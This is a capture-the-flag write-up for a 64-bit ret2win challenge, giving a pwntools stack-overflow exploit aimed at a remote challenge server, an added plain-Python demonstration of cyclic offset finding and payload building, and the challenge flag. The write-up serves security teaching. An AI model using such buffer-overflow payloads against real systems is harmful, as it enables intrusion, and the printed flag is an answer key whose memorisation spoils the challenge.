win... win... window...!
Challenge Description :

Basic File Enumeration :
The binary is 64-bit and not stripped. The only protection enabled is NX, which makes the stack non-executable: shellcode placed on the stack will not run, so we have to reuse code that already exists in the binary.

Opening the binary in Ghidra, we find two interesting functions:
the main function, which is vulnerable to a stack buffer overflow,

and the shell function, which spawns bash. Our goal is to redirect execution to this function (a classic ret2win).
First we need to know how many bytes it takes to reach the saved return address (RIP, since this is a 64-bit binary).
Offset to RIP :


So the offset to RIP is 18 bytes.
Exploit :
from pwn import *
# Set up pwntools for the correct architecture
exe = './win'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'debug'
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# io = process(exe)  # run locally first to confirm the offset and the crash
io = remote('173.255.201.51', 3337)
offset = 18
ret = 0x40101a  # ret gadget (ropper --file=win --search="ret")
payload = flat(
    offset * b'A',  # filler up to the saved return address
    ret,            # stack alignment: pops 8 bytes so rsp is 16-byte aligned when shell() calls into libc
    elf.sym.shell   # address of shell(), then execution lands there after the extra ret
)
io.sendline(payload)
io.interactive()
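The two steps above (finding the offset with a cyclic pattern, then building a ret2win chain with an alignment gadget) are shown below in plain Python without pwntools, as an added example that is not part of the original writeup. It reimplements the de Bruijn pattern that pwntools' cyclic()/cyclic_find() use, simulates the crash with a constructed stack layout where the saved RIP sits 18 bytes into the input, and builds the same payload as the exploit. The ret gadget address 0x40101a comes from the writeup; the shell() address 0x401136 is a hypothetical placeholder (use elf.sym.shell on the real binary).

```python
import struct
from functools import lru_cache

# Lowercase alphabet and 4-byte windows match the defaults of pwntools' cyclic()
# and cyclic_find(), so offsets found here agree with that tooling.
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
SUBSEQ_LEN = 4


@lru_cache(maxsize=None)
def de_bruijn(alphabet=ALPHABET, n=SUBSEQ_LEN):
    """Full de Bruijn sequence B(k, n): every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)


def cyclic(length):
    """Pattern to send as the crashing input (equivalent of pwntools cyclic(length))."""
    return de_bruijn()[:length]


def cyclic_find(value):
    """Offset of a 4-byte window in the pattern. `value` may be the raw bytes that
    landed in RIP or the integer a debugger printed. Returns -1 if not found."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return de_bruijn().find(value[:SUBSEQ_LEN])


def p64(addr):
    return struct.pack("<Q", addr)


def build_payload(offset, target, ret_gadget=None):
    """Filler up to the saved RIP, an optional `ret` gadget, then the target address."""
    payload = b"A" * offset
    if ret_gadget is not None:
        payload += p64(ret_gadget)
    payload += p64(target)
    # gets()/fgets() stop at a newline and sendline() appends one: a 0x0a byte inside an
    # address would truncate the chain silently, so refuse such payloads up front.
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; a line-based read would truncate it")
    return payload


def shell_entry_rsp_mod16(n_ret_gadgets):
    """rsp mod 16 when execution lands in shell(). With the usual `push rbp` prologue and
    `leave; ret` epilogue, main()'s ret leaves rsp 16-byte aligned, but the SysV ABI
    expects rsp == 8 (mod 16) at function entry (what a real `call` produces); without
    the fix, aligned SSE stores (movaps) in libc fault. Each extra `ret` pops 8 bytes."""
    return (8 * n_ret_gadgets) % 16


def demo():
    # Constructed stand-in for the crash: 18 bytes of locals + saved rbp, then saved RIP.
    OFFSET_ACTUAL = 18
    pattern = cyclic(64)
    crashed_rip = struct.unpack("<Q", pattern[OFFSET_ACTUAL:OFFSET_ACTUAL + 8])[0]
    offset = cyclic_find(crashed_rip)          # what cyclic_find(rip) gives in gdb
    RET_GADGET = 0x40101a                      # from the writeup (ropper --search="ret")
    SHELL_ADDR = 0x401136                      # hypothetical; elf.sym.shell on the real binary
    assert shell_entry_rsp_mod16(1) == 8       # one ret gadget restores ABI alignment
    return offset, build_payload(offset, SHELL_ADDR, RET_GADGET)


if __name__ == "__main__":
    off, chain = demo()
    print("offset:", off)
    print("payload:", chain.hex())
```

The alignment helper is the reason the exploit carries a bare ret gadget before shell(): skipping it leaves rsp 16-byte aligned at shell()'s entry, which is exactly the state a real call never produces.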

Flag :
KCTF{r3T_7o_W1n_iS_V3rRY_3AsY}